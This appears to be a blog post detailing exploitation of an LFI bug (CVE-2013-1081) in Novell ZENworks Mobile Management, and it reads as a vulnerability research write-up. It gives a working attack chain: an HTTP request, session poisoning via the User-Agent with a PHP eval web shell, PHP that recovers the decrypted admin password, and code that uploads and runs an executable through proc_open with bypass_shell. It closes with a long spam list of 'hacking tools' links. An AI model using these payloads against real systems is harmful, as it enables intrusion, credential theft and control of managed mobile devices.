////

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

Related news
  1. Hackers Toolbox
  2. Pentest Tools Bluekeep
  3. Hack Tools For Ubuntu
  4. Free Pentest Tools For Windows
  5. Pentest Tools Bluekeep
  6. Hacking Tools For Beginners
  7. Hacking Tools Software
  8. Hacking Tools 2020
  9. Top Pentest Tools
  10. Pentest Tools For Android
  11. Physical Pentest Tools
  12. What Is Hacking Tools
  13. Hack Tools For Windows
  14. Underground Hacker Sites
  15. Wifi Hacker Tools For Windows
  16. Hack Tools For Mac
  17. New Hacker Tools
  18. Hack App
  19. Pentest Tools Tcp Port Scanner
  20. Pentest Tools Find Subdomains
  21. Pentest Tools Tcp Port Scanner
  22. Pentest Recon Tools
  23. How To Hack
  24. Easy Hack Tools
  25. Pentest Tools Open Source
  26. Black Hat Hacker Tools
  27. How To Hack
  28. Hacker Tools
  29. Hacking Tools Mac
  30. Free Pentest Tools For Windows
  31. Beginner Hacker Tools
  32. Hacks And Tools
  33. Hack Tools Mac
  34. How To Make Hacking Tools
  35. Pentest Tools Android
  36. Hack Tool Apk No Root
  37. Hackers Toolbox
  38. Hacks And Tools
  39. Hacker Search Tools
  40. Beginner Hacker Tools
  41. Easy Hack Tools
  42. Hack Tool Apk No Root
  43. Hacker Tools For Mac
  44. Hacking Tools For Kali Linux
  45. Hack Tools
  46. Pentest Tools Tcp Port Scanner
  47. Tools For Hacker
  48. Hacker Tools Mac
  49. Hacking Tools Windows
  50. Hacker Tools Windows
  51. Best Hacking Tools 2020
  52. Hacker Security Tools
  53. Hack Tools Github
  54. Best Hacking Tools 2020
  55. Blackhat Hacker Tools
  56. Nsa Hack Tools
  57. Hacking Tools For Pc
  58. Pentest Tools Framework
  59. What Is Hacking Tools
  60. How To Make Hacking Tools
  61. Hacker Tools Linux
  62. Hacker Tools Linux
  63. Pentest Tools Website Vulnerability
  64. Hack Tool Apk No Root
  65. Pentest Tools Framework
  66. Best Pentesting Tools 2018
  67. Hacker Hardware Tools
  68. Pentest Box Tools Download
  69. Hacking Tools Kit
  70. Termux Hacking Tools 2019
  71. Pentest Tools Website Vulnerability
  72. Hacker Tools Online
  73. Best Pentesting Tools 2018
  74. Hacker Tools Apk
  75. Hack Tools Download
  76. Pentest Tools Nmap
  77. Hacking Tools Download
  78. Physical Pentest Tools
  79. Pentest Tools Online
  80. Hack Website Online Tool
  81. World No 1 Hacker Software
  82. Pentest Tools Download
  83. Hacker Tools For Pc
  84. Hacker Tools Linux
  85. Hacker Tools
  86. Pentest Tools Find Subdomains
  87. Android Hack Tools Github
  88. Nsa Hacker Tools
  89. Wifi Hacker Tools For Windows
  90. Hack Tools For Ubuntu
  91. Hacking Tools Github
  92. Computer Hacker
  93. Pentest Tools Kali Linux
  94. What Are Hacking Tools
  95. Hackers Toolbox
  96. Termux Hacking Tools 2019
  97. Tools 4 Hack
  98. Hacking Tools Name
  99. Hack Tool Apk
  100. Pentest Tools For Android
  101. Game Hacking
  102. New Hack Tools
  103. Hacker Tools Hardware
  104. Kik Hack Tools
  105. Hack Tool Apk No Root

0 Reactions to this post

Add Comment

    Post a Comment